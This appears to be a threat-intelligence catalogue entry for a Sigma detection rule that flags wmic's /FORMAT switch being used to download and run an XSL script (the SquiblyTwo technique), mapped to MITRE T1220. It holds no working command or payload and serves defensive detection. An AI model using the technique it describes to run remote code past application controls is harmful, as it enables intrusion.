WMIC Loading Scripting Libraries (06ce37c2-61ab-4f05-9ff5-b1a96d18ae32)
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the /FORMAT argument switch to download and execute an XSL file (i.e js, vbs, etc).
It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.
| Cluster A | Galaxy A | Cluster B | Galaxy B | Level |
|---|---|---|---|---|
| XSL Script Processing - T1220 (ebbe170d-aa74-4946-8511-9921243415a3) | Attack Pattern | WMIC Loading Scripting Libraries (06ce37c2-61ab-4f05-9ff5-b1a96d18ae32) | Sigma-Rules | 1 |